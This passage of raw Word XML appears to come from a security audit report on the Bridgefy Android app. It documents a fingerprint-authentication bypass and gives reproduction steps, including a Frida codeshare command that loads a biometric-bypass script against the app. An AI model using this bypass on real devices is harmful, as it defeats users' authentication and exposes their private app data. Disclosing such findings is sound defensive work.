      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Keystore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a malicious attacker with access to an unlocked device could leverage this weakness to gain access to all the authenticated screens of the Android app, hence defeating the intended protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>already,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>showing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the fingerprint must be entered (do not enter the fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>computer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>connected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Frida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Frida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>frida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--codeshare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>krapgras/android-biometric-bypass-update-android-11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>me.bridgefy.main.staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can now navigate all screens without access to the fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The root cause of this issue can be seen in the relevant files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application, which are currently not using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CryptoObject</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487595520">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216601</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="28" name="Graphic 28"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="28" name="Graphic 28"/>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7.055225pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15720960;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape19" coordorigin="1440,341" coordsize="2880,0" path="m1440,341l4320,341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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://labs.f-secure.com/blog/how-secure-is-your-android-keystore-authentication</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/util/FingerprintManager.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="2303" w:right="0" w:hanging="1584"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onAuthenticationSucceeded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BiometricPrompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AuthenticationResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
